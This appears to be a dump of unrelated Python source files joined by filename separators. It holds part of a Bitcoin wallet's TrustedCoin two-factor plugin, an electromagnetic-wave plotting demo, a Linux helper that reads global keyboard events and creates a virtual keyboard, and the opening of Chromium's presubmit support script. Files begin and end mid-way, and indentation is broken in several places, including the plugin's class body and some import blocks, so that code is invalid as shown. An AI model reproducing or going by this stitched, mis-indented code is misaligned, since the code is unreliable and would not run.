    def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
        """Record a server-reported billing address, backfilling gaps."""
        billing_addresses_of_this_type = self._billing_addresses[addr_type]
        saved_addr = billing_addresses_of_this_type.get(billing_index)
        if saved_addr is not None:
            if saved_addr == address:
                return  # already saved this address
            else:
                raise Exception('trustedcoin billing address inconsistency.. '
                                'for index {}, already saved {}, now got {}'
                                .format(billing_index, saved_addr, address))
        # do we have all prior indices? (are we synced?)
        largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
        if largest_index_we_have + 1 < billing_index:  # need to sync
            for i in range(largest_index_we_have + 1, billing_index):
                addr = make_billing_address(self, i, addr_type=addr_type)
                billing_addresses_of_this_type[i] = addr
                self._billing_addresses_set.add(addr)
        # save this address; and persist to disk
        billing_addresses_of_this_type[billing_index] = address
        self._billing_addresses_set.add(address)
        self._billing_addresses[addr_type] = billing_addresses_of_this_type
        self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
        self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
        # FIXME this often runs in a daemon thread, where storage.write will fail
        self.storage.write()

    def is_billing_address(self, addr: str) -> bool:
        return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
    """Derive the (long_id, short_id) user identifier from the two xpubs."""
    xpub_hot = storage.get('x1/')['xpub']
    xpub_cold = storage.get('x2/')['xpub']
    # order-independent: sort before hashing so either key may be "first"
    long_id = sha256(''.join(sorted((xpub_hot, xpub_cold))))
    short_id = hashlib.sha256(long_id).hexdigest()
    return long_id, short_id
def make_xpub(xpub, s) -> str:
    """Derive a non-standard child xpub of *xpub* using *s* as child index."""
    root = BIP32Node.from_xkey(xpub)
    # NOTE: uses the private _CKD_pub helper with a non-int child index
    pubkey, chaincode = bip32._CKD_pub(
        parent_pubkey=root.eckey.get_public_key_bytes(compressed=True),
        parent_chaincode=root.chaincode,
        child_index=s)
    child = BIP32Node(xtype=root.xtype,
                      eckey=ecc.ECPubkey(pubkey),
                      chaincode=chaincode)
    return child.to_xpub()
def make_billing_address(wallet, num, addr_type):
    """Derive billing address number *num* for *wallet* ('legacy'|'segwit')."""
    long_id, short_id = wallet.get_user_id()
    user_xpub = make_xpub(get_billing_xpub(), long_id)
    node = BIP32Node.from_xkey(user_xpub).subkey_at_public_derivation([num])
    pubkey = node.eckey.get_public_key_bytes(compressed=True)
    if addr_type == 'segwit':
        return bitcoin.public_key_to_p2wpkh(pubkey)
    if addr_type == 'legacy':
        return bitcoin.public_key_to_p2pkh(pubkey)
    raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
    BasePlugin.__init__(self, parent, config, name)
    # NOTE: mutates the *class* attribute, so every Wallet_2fa instance can
    # reach back to this plugin via self.plugin.
    self.wallet_class.plugin = self
    # guards against launching concurrent billing-info request threads
    self.requesting = False
@staticmethod
def is_valid_seed(seed):
    """Return True when *seed* is one of the 2FA seed types."""
    return is_any_2fa_seed_type(seed_type(seed))
def is_available(self):
    # plugin has no platform-specific requirements
    return True

def is_enabled(self):
    return True

def can_user_disable(self):
    # 2FA is structural to the wallet type, not an optional feature
    return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
    """Return a callback that asks for an OTP, or None if not needed."""
    if not isinstance(wallet, self.wallet_class):
        return
    if tx.is_complete():
        return
    if wallet.can_sign_without_server():
        return
    if not wallet.keystores['x3/'].get_tx_derivations(tx):
        # the server key is not among the missing signatures
        self.logger.info("twofactor: xpub3 not needed")
        return

    def wrapper(tx):
        self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
    return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
    """Return (address, value) of the TrustedCoin fee output in *tx*, if any."""
    # isinstance instead of type() comparison — consistent with
    # tc_sign_wrapper's isinstance check, and correct for subclasses.
    if not isinstance(wallet, Wallet_2fa):
        return
    for o in tx.outputs():
        if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
            return o.address, o.value
def finish_requesting(func):
    # NOTE: defined in the class body and used as a decorator below (it is a
    # plain function here, not a method).  Ensures self.requesting is cleared
    # when the wrapped call finishes, so start_request_thread() can run again.
    def f(self, *args, **kwargs):
        try:
            return func(self, *args, **kwargs)
        finally:
            self.requesting = False
    return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
    """Fetch billing info from the server and verify/record the addresses."""
    if wallet.can_sign_without_server():
        return
    self.logger.info("request billing info")
    try:
        billing_info = server.get(wallet.get_user_id()[1])
    except ErrorConnectingServer as e:
        if suppress_connection_error:
            # best-effort fetch: just log and give up
            self.logger.info(str(e))
            return
        raise
    billing_index = billing_info['billing_index']
    # add segwit billing address; this will be used for actual billing
    billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
    # verify the server-reported address against our own derivation before
    # trusting it
    if billing_address != billing_info['billing_address_segwit']:
        raise Exception(f'unexpected trustedcoin billing address: '
                        f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
    wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
    # also add legacy billing address; only used for detecting past payments in GUI
    billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
    wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
    wallet.billing_info = billing_info
    wallet.price_per_tx = dict(billing_info['price_per_tx'])
    # single-tx price is not offered as a prepay bundle
    wallet.price_per_tx.pop(1, None)
    return True
def start_request_thread(self, wallet):
    """Fetch billing info on a background thread (at most one at a time).

    Returns the started Thread, or None if a request is already running.
    """
    from threading import Thread
    if self.requesting is False:
        self.requesting = True
        # daemon=True kwarg replaces the deprecated Thread.setDaemon() call
        t = Thread(target=self.request_billing_info, args=(wallet,), daemon=True)
        t.start()
        return t
def make_seed(self, seed_type):
    """Create a new 128-bit english mnemonic of the given 2FA seed type.

    Raises Exception when *seed_type* is not a 2FA seed type.
    """
    if not is_any_2fa_seed_type(seed_type):
        raise Exception(f'unexpected seed type: {seed_type}')
    return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
    # Hook: reset the per-wallet billing flag when the send form is cleared.
    window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
    """First wizard page: show the TrustedCoin disclaimer, then seed choice."""
    wizard.set_icon('trustedcoin-wizard.png')
    wizard.reset_stack()  # the disclaimer becomes the starting point (no "back")
    wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
    """Wizard step: create a fresh seed or restore from an existing one."""
    title = _('Create or restore')
    message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
    # each choice maps to the name of the next wizard step
    choices = [
        ('choose_seed_type', _('Create a new seed')),
        ('restore_wallet', _('I already have a seed')),
    ]
    wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
    """Wizard step: pick the 2FA seed flavor (segwit vs legacy)."""
    choices = [
        ('create_2fa_segwit_seed', _('Segwit 2FA')),
        ('create_2fa_seed', _('Legacy 2FA')),
    ]
    wizard.choose_seed_type(choices=choices)
# Thin wrappers selecting the concrete 2FA seed type.
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')

def create_seed(self, wizard, seed_type):
    """Generate a seed of *seed_type*, display it, then ask for a passphrase."""
    seed = self.make_seed(seed_type)
    f = lambda x: wizard.request_passphrase(seed, x)
    wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
    """Derive (xprv, xpub) at *derivation* from a 2FA mnemonic.

    *t* selects the script type: 'standard' for legacy '2fa' seeds,
    p2wsh otherwise.  (NOTE(review): first parameter is conventionally
    named ``cls`` on a classmethod; kept as-is.)
    """
    assert is_any_2fa_seed_type(t)
    xtype = 'standard' if t == '2fa' else 'p2wsh'
    bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
    rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
    child_node = rootnode.subkey_at_private_derivation(derivation)
    return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
    """Derive the two user key pairs (x1, x2) from a 2FA seed.

    Handles both the modern short-seed scheme (one seed, two hardened
    branches) and the pre-2.7 long-seed scheme (two independent word
    groups, no passphrase allowed).  Returns (xprv1, xpub1, xprv2, xpub2).
    """
    t = seed_type(seed)
    if not is_any_2fa_seed_type(t):
        raise Exception(f'unexpected seed type: {t}')
    words = seed.split()
    n = len(words)
    # old version use long seed phrases
    if n >= 20:
        # note: pre-2.7 2fa seeds were typically 24-25 words, however they
        # could probabilistically be arbitrarily shorter due to a bug. (see #3611)
        # the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
        if passphrase != '':
            raise Exception('old 2fa seed cannot have passphrase')
        # first 12 words and the remainder act as two independent seeds,
        # each derived at the root path
        xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
        xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
    elif not t == '2fa' or n == 12:
        # modern scheme: same seed, two hardened derivation branches
        xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
        xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
    else:
        raise Exception('unrecognized seed length: {} words'.format(n))
    return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
    """Build the two user keystores, then ask for a wallet password.

    k1 keeps the first private key; k2 stores only the second public key.
    (this overloads the wizard's method)
    """
    xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
    k1 = keystore.from_xprv(xprv1)
    k2 = keystore.from_xpub(xpub2)
    wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
    """Encrypt k1 with the chosen password and stage wallet data for creation."""
    k1.update_password(None, password)
    wizard.data['x1/'] = k1.dump()
    wizard.data['x2/'] = k2.dump()
    # consumed later by the wizard when the storage file is created
    wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
    self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
    """Wizard step: restore a 2FA wallet from an existing seed."""
    wizard.opt_bip39 = False  # BIP39 seeds are not valid 2FA seeds
    wizard.opt_ext = True     # allow seed extension (passphrase)
    # NOTE(review): `title` is assigned but never passed to the dialog --
    # possibly an oversight; confirm whether restore_seed_dialog accepts it.
    title = _("Restore two-factor Wallet")
    f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
    wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
    """After seed entry: collect the passphrase if extended, else continue."""
    f = lambda x: self.restore_choice(wizard, seed, x)
    # Plain if/else statement instead of a conditional *expression*
    # evaluated only for its side effects (clearer, linter-friendly).
    if is_ext:
        wizard.passphrase_dialog(run_next=f)
    else:
        f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
    """Ask whether to keep 2FA enabled or restore with both private keys."""
    wizard.set_icon('trustedcoin-wizard.png')
    wizard.reset_stack()
    title = _('Restore 2FA wallet')
    msg = ' '.join([
        'You are going to restore a wallet protected with two-factor authentication.',
        'Do you want to keep using two-factor authentication with this wallet,',
        'or do you want to disable it, and have two master private keys in your wallet?'
    ])
    choices = [('keep', 'Keep'), ('disable', 'Disable')]
    f = lambda x: self.on_choice(wizard, seed, passphrase, x)
    wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
    """Dispatch on the keep/disable decision made in restore_choice()."""
    if x != 'disable':
        # keep 2FA enabled: build the usual 2-of-3 keystore setup
        self.create_keystore(wizard, seed, passphrase)
        return
    # disable 2FA: ask for a password, then restore with both private keys
    on_pw = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
    wizard.request_password(run_next=on_pw)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
    """Restore with 2FA disabled: both user private keys are kept locally.

    x3 (the co-signing xpub) is still derived deterministically and stored,
    but no server round-trip is performed.
    """
    xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
    k1 = keystore.from_xprv(xprv1)
    k2 = keystore.from_xprv(xprv2)
    k1.add_seed(seed)
    k1.update_password(None, password)
    k2.update_password(None, password)
    wizard.data['x1/'] = k1.dump()
    wizard.data['x2/'] = k2.dump()
    long_user_id, short_id = get_user_id(wizard.data)
    xtype = xpub_type(xpub1)
    # derive the server's xpub locally from the user id
    xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
    k3 = keystore.from_xpub(xpub3)
    wizard.data['x3/'] = k3.dump()
    wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
    wizard.terminate()
def create_remote_key(self, email, wizard):
    """Register the wallet with the TrustedCoin server and obtain xpub3.

    The third key is derived deterministically from the user's data and
    cross-checked against what the server reports before proceeding to
    the OTP dialog.
    """
    xpub1 = wizard.data['x1/']['xpub']
    xpub2 = wizard.data['x2/']['xpub']
    # Generate third key deterministically.
    long_user_id, short_id = get_user_id(wizard.data)
    xtype = xpub_type(xpub1)
    xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
    # secret must be sent by the server
    try:
        r = server.create(xpub1, xpub2, email)
    except (socket.error, ErrorConnectingServer):
        wizard.show_message('Server not reachable, aborting')
        wizard.terminate()
        return
    except TrustedCoinException as e:
        if e.status_code == 409:
            # 409 Conflict: this wallet is already registered server-side
            r = None
        else:
            wizard.show_message(str(e))
            return
    if r is None:
        otp_secret = None
    else:
        otp_secret = r.get('otp_secret')
        if not otp_secret:
            wizard.show_message(_('Error'))
            return
        # sanity-check the server's response against our local derivation
        _xpub3 = r['xpubkey_cosigner']
        _id = r['id']
        if short_id != _id:
            wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
                                .format(short_id, _id))
            return
        if xpub3 != _xpub3:
            wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
                                .format(xpub3, _xpub3))
            return
    self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
    """Handle the OTP dialog result: verify the OTP, or start a secret reset."""
    if otp:
        self.do_auth(wizard, short_id, otp, xpub3)
    elif reset:
        wizard.opt_bip39 = False
        wizard.opt_ext = True
        # re-enter the seed to prove ownership before resetting the OTP secret
        f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
        wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
    """After seed re-entry for the OTP reset: collect passphrase if extended."""
    f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
    # Statement form instead of a side-effecting conditional expression.
    if is_ext:
        wizard.passphrase_dialog(run_next=f)
    else:
        f('')
def do_auth(self, wizard, short_id, otp, xpub3):
    """Submit the OTP to the server; on success finalize wallet creation."""
    try:
        server.auth(short_id, otp)
    except TrustedCoinException as e:
        if e.status_code == 400:  # invalid OTP
            wizard.show_message(_('Invalid one-time password.'))
            # ask again for otp
            self.request_otp_dialog(wizard, short_id, None, xpub3)
        else:
            wizard.show_message(str(e))
            wizard.terminate()
    except Exception as e:
        wizard.show_message(str(e))
        wizard.terminate()
    else:
        # OTP accepted: store the server key and mark the wallet as 2FA-backed
        k3 = keystore.from_xpub(xpub3)
        wizard.data['x3/'] = k3.dump()
        wizard.data['use_trustedcoin'] = True
        wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
    """Prove seed ownership to the server in order to reset the OTP secret.

    Signs a server-provided challenge with both user master keys; on
    success the server returns a fresh OTP secret.
    """
    xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
    # the re-entered seed must reproduce the stored xpubs
    if (wizard.data['x1/']['xpub'] != xpub1 or
            wizard.data['x2/']['xpub'] != xpub2):
        wizard.show_message(_('Incorrect seed'))
        return
    r = server.get_challenge(short_id)
    challenge = r.get('challenge')
    message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
    def f(xprv):
        # sign the challenge with the key at (0, 0) under each master key
        rootnode = BIP32Node.from_xkey(xprv)
        key = rootnode.subkey_at_private_derivation((0, 0)).eckey
        sig = key.sign_message(message, True)
        return base64.b64encode(sig).decode()
    signatures = [f(x) for x in [xprv1, xprv2]]
    r = server.reset_auth(short_id, challenge, signatures)
    new_secret = r.get('otp_secret')
    if not new_secret:
        wizard.show_message(_('Request rejected by server'))
        return
    self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
    """Tell the wizard which setup step a (possibly partial) 2FA wallet
    still needs, or None when no action is required."""
    if storage.get('wallet_type') != '2fa':
        return
    if not storage.get('x1/'):
        return self, 'show_disclaimer'
    if not storage.get('x2/'):
        return self, 'show_disclaimer'
    if not storage.get('x3/'):
        # both user keys exist; only the server key is missing
        return self, 'accept_terms_of_use'
|
em_waves_demo1.py | """
Demo [em_waves](https://pypi.org/project/em-waves)
Running:
after installing em_waves with:
`pip3 install em_waves`
type:
`python3 em_waves_demo1.py`
"""
import multiprocessing
from em_waves import Medium, Sine, Gaussian, Rect
SHOW_PLOT = True
def proc_func(wave):
    """Worker body: report the wave on stdout, then open its plot window."""
    print(wave)
    wave.show()
def print_recap(*args):
    """Print a recap table of the chosen parameters.

    args = (f_0 [GHz], ε_r_1, ε_r_2, σ_1, σ_2); *args kept for backward
    compatibility, unpacked into names for readability.
    """
    f_0, ε_r_1, ε_r_2, σ_1, σ_2 = args[:5]
    sep = "-" * 20  # plain string literal; the old code used pointless f-strings
    print(sep)
    print(f"f_0: {f_0} GHz")
    print(sep)
    print(f"ε_r_1: {ε_r_1:<10} ε_r_2: {ε_r_2}")
    print(f"σ_1: {σ_1:<10} σ_2: {σ_2}")
    print(sep)
def main():
    """Interactively collect wave/medium parameters and show the demo plots."""
    print("Insert data when prompted, if skipped default value will be used.")
    # `or default` applies when the user just presses enter ('' is falsy)
    f_0 = float(input("Insert frequency in GHz: ") or 1.8)
    ε_r_1 = float(input("Insert ε_r_1: ") or 1.0)
    ε_r_2 = float(input("Insert ε_r_2: ") or 4.0)
    σ_1 = float(input("Insert σ_1: ") or 0)
    σ_2 = float(input("Insert σ_2: ") or 4e-10)
    print_recap(f_0, ε_r_1, ε_r_2, σ_1, σ_2)
    medium1 = Medium(ε_r=ε_r_1, μ_r=1, σ=σ_1)
    medium2 = Medium(ε_r=ε_r_2, μ_r=2.5, σ=σ_2)
    # three example excitations crossing the medium1/medium2 interface
    sine = Sine(f=f_0, A=10.0)
    gaussian = Gaussian(rms=1.3)
    rect = Rect(width=4)
    sine.add_mediums(medium1=medium1, medium2=medium2)
    gaussian.add_mediums(medium1=medium1, medium2=medium2)
    rect.add_mediums(medium1=medium1, medium2=medium2)
    sine.print_data()
    if SHOW_PLOT:
        # display plot windows in multithreading, or rather in multiprocessing since matplotlib crashes when multithreaded.
        d = {0: sine, 1: gaussian, 2: rect}
        p = []
        for i in range(len(d)):
            p.append( multiprocessing.Process(target=proc_func, args=(d[i],)) )
        for proc in p:
            proc.start()
        for proc in p:
            proc.join()
if __name__ == '__main__':
main()
|
_nixcommon.py | # -*- coding: utf-8 -*-
import struct
import os
import atexit
from time import time as now
from threading import Thread
from glob import glob
try:
from queue import Queue
except ImportError:
from Queue import Queue
event_bin_format = 'llHHI'
# Taken from include/linux/input.h
# https://www.kernel.org/doc/Documentation/input/event-codes.txt
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
def make_uinput():
    """Create a virtual keyboard through /dev/uinput and return its file object.

    Raises IOError when the uinput device node does not exist.
    """
    if not os.path.exists('/dev/uinput'):
        raise IOError('No uinput module found.')
    import fcntl, struct
    # Requires uinput driver, but it's usually available.
    uinput = open("/dev/uinput", 'wb')
    # ioctl request numbers below are hard-coded from linux/uinput.h --
    # NOTE(review): assumed to match the kernel's uinput ABI; verify against
    # the headers if device creation misbehaves.
    UI_SET_EVBIT = 0x40045564
    fcntl.ioctl(uinput, UI_SET_EVBIT, EV_KEY)
    UI_SET_KEYBIT = 0x40045565
    # enable every possible key code (0..255) on the virtual device
    for i in range(256):
        fcntl.ioctl(uinput, UI_SET_KEYBIT, i)
    BUS_USB = 0x03
    # struct uinput_user_dev layout: 80-byte name, four u16 id fields, an
    # int, then four 64-int abs-axis arrays (all zero here).
    uinput_user_dev = "80sHHHHi64i64i64i64i"
    axis = [0] * 64 * 4
    uinput.write(struct.pack(uinput_user_dev, b"Virtual Keyboard", BUS_USB, 1, 1, 1, 0, *axis))
    uinput.flush() # Without this you may get Errno 22: Invalid argument.
    UI_DEV_CREATE = 0x5501
    fcntl.ioctl(uinput, UI_DEV_CREATE)
    UI_DEV_DESTROY = 0x5502
    #fcntl.ioctl(uinput, UI_DEV_DESTROY)
    return uinput
class EventDevice(object):
    """One /dev/input event device, lazily opened for reading and writing."""
    def __init__(self, path):
        self.path = path
        self._input_file = None   # opened on first read access
        self._output_file = None  # opened on first write access

    @property
    def input_file(self):
        """Binary read handle, opened on first access and closed at exit.

        Prints a hint and exits the process when permission is denied.
        """
        if self._input_file is None:
            try:
                self._input_file = open(self.path, 'rb')
            except IOError as e:
                if e.strerror == 'Permission denied':
                    print('Permission denied ({}). You must be sudo to access global events.'.format(self.path))
                    exit()
            def try_close():
                try:
                    # BUG FIX: previously `self._input_file.close` (a bare
                    # attribute access, never invoked) -- the handle was
                    # never actually closed at exit.
                    self._input_file.close()
                except:
                    pass
            atexit.register(try_close)
        return self._input_file

    @property
    def output_file(self):
        """Binary write handle, opened on first access and closed at exit."""
        if self._output_file is None:
            self._output_file = open(self.path, 'wb')
            atexit.register(self._output_file.close)
        return self._output_file

    def read_event(self):
        """Block for one input event; return (timestamp, type, code, value, path)."""
        data = self.input_file.read(struct.calcsize(event_bin_format))
        seconds, microseconds, type, code, value = struct.unpack(event_bin_format, data)
        return seconds + microseconds / 1e6, type, code, value, self.path

    def write_event(self, type, code, value):
        """Write one event followed by an EV_SYN marker so listeners update."""
        integer, fraction = divmod(now(), 1)
        seconds = int(integer)
        microseconds = int(fraction * 1e6)
        data_event = struct.pack(event_bin_format, seconds, microseconds, type, code, value)
        # Send a sync event to ensure other programs update.
        sync_event = struct.pack(event_bin_format, seconds, microseconds, EV_SYN, 0, 0)
        self.output_file.write(data_event + sync_event)
        self.output_file.flush()
class AggregatedEventDevice(object):
    """Merge events from several devices into a single queue.

    One daemon reader thread per device pushes events into a shared
    queue; synthetic events are written to *output* (defaults to the
    first device).
    """
    def __init__(self, devices, output=None):
        self.event_queue = Queue()
        self.devices = devices
        self.output = output or self.devices[0]
        def start_reading(device):
            while True:
                self.event_queue.put(device.read_event())
        for device in self.devices:
            thread = Thread(target=start_reading, args=[device])
            # `thread.daemon = True` replaces the deprecated setDaemon();
            # readers must not keep the interpreter alive at shutdown.
            thread.daemon = True
            thread.start()

    def read_event(self):
        """Block until any device produces an event, and return it."""
        return self.event_queue.get(block=True)

    def write_event(self, type, code, value):
        """Forward a synthetic event to the output device."""
        self.output.write_event(type, code, value)
import re
from collections import namedtuple
DeviceDescription = namedtuple('DeviceDescription', 'event_file is_mouse is_keyboard')
device_pattern = r"""N: Name="([^"]+?)".+?H: Handlers=([^\n]+)"""
def list_devices_from_proc(type_name):
    """Yield an EventDevice for each /proc input device whose handlers
    mention *type_name* (e.g. 'mouse' or 'kbd').

    Yields nothing when /proc/bus/input/devices is unavailable.
    """
    try:
        with open('/proc/bus/input/devices') as f:
            description = f.read()
    except FileNotFoundError:
        return  # not Linux, or /proc not mounted
    # (removed an unused `devices = {}` local left over from a refactor)
    for name, handlers in re.findall(device_pattern, description, re.DOTALL):
        # handlers contains e.g. "kbd event3"; map that to /dev/input/event3
        path = '/dev/input/event' + re.search(r'event(\d+)', handlers).group(1)
        if type_name in handlers:
            yield EventDevice(path)
def list_devices_from_by_id(name_suffix, by_id=True):
    """Yield EventDevices found via /dev/input/by-id (or by-path) symlinks."""
    directory = 'by-id' if by_id else 'by-path'
    pattern = '/dev/input/{}/*-event-{}'.format(directory, name_suffix)
    for path in glob(pattern):
        yield EventDevice(path)
def aggregate_devices(type_name):
    """Return one device aggregating every input device of *type_name*.

    Looks in /proc first, then /dev/input/by-id, then by-path.  Writes go
    through a virtual uinput device when one can be created; with no real
    devices found, the uinput device alone is returned.
    """
    # Some systems have multiple keyboards with different range of allowed keys
    # on each one, like a notebook with a "keyboard" device exclusive for the
    # power button. Instead of figuring out which keyboard allows which key to
    # send events, we create a fake device and send all events through there.
    try:
        uinput = make_uinput()
        fake_device = EventDevice('uinput Fake Device')
        fake_device._input_file = uinput
        fake_device._output_file = uinput
    except IOError as e:
        import warnings
        warnings.warn('Failed to create a device file using `uinput` module. Sending of events may be limited or unavailable depending on plugged-in devices.', stacklevel=2)
        fake_device = None
    # We don't aggregate devices from different sources to avoid
    # duplicates.
    devices_from_proc = list(list_devices_from_proc(type_name))
    if devices_from_proc:
        return AggregatedEventDevice(devices_from_proc, output=fake_device)
    # breaks on mouse for virtualbox
    # was getting /dev/input/by-id/usb-VirtualBox_USB_Tablet-event-mouse
    devices_from_by_id = list(list_devices_from_by_id(type_name)) or list(list_devices_from_by_id(type_name, by_id=False))
    if devices_from_by_id:
        return AggregatedEventDevice(devices_from_by_id, output=fake_device)
    # If no keyboards were found we can only use the fake device to send keys.
    assert fake_device
    return fake_device
def ensure_root():
    """Raise unless the process runs with effective UID 0.

    NOTE(review): raises ImportError rather than PermissionError --
    presumably because this runs at module import time; confirm before
    changing the exception type, as callers may catch ImportError.
    """
    if os.geteuid() != 0:
        raise ImportError('You must be root to use this library on linux.')
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
    """Generic failure raised by the presubmit machinery."""
    pass
class CommandData(object):
    """Description of one external test command to run.

    stdout/stderr are forced to a combined pipe so output can be captured
    and attached to the result message; stdin is piped so data can be fed.
    """
    def __init__(self, name, cmd, kwargs, message):
        self.name = name
        self.cmd = cmd
        self.stdin = kwargs.get('stdin', None)
        self.kwargs = kwargs
        # capture combined output; overrides any caller-supplied handles
        self.kwargs['stdout'] = subprocess.PIPE
        self.kwargs['stderr'] = subprocess.STDOUT
        self.kwargs['stdin'] = subprocess.PIPE
        self.message = message
        self.info = None  # optional callable for non-failure result messages
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
    """Tracks SIGINT across this process and its child processes.

    Once a SIGINT is observed -- delivered to this process, or inferred
    from a child's return code -- every registered child is terminated
    and wait() raises ProcessWasInterrupted.  Constructing an instance
    installs it as the process-wide SIGINT handler.
    """
    class ProcessWasInterrupted(Exception):
        pass
    # return codes that mean "killed by Ctrl+C"
    sigint_returncodes = {-signal.SIGINT,  # Unix
                          -1073741510,     # Windows
                         }
    def __init__(self):
        self.__lock = threading.Lock()
        self.__processes = set()  # children currently being waited on
        self.__got_sigint = False
        # install as the process-wide SIGINT handler
        signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
    def __on_sigint(self):
        # caller must already hold self.__lock
        self.__got_sigint = True
        while self.__processes:
            try:
                self.__processes.pop().terminate()
            except OSError:
                pass  # process already gone
    def interrupt(self):
        with self.__lock:
            self.__on_sigint()
    def got_sigint(self):
        with self.__lock:
            return self.__got_sigint
    def wait(self, p, stdin):
        """Wait for process *p*, feeding it *stdin*; return (stdout, stderr).

        Raises ProcessWasInterrupted when a SIGINT was seen before, during,
        or (via the child's return code) because of this wait.
        """
        with self.__lock:
            if self.__got_sigint:
                p.terminate()
            self.__processes.add(p)
        stdout, stderr = p.communicate(stdin)
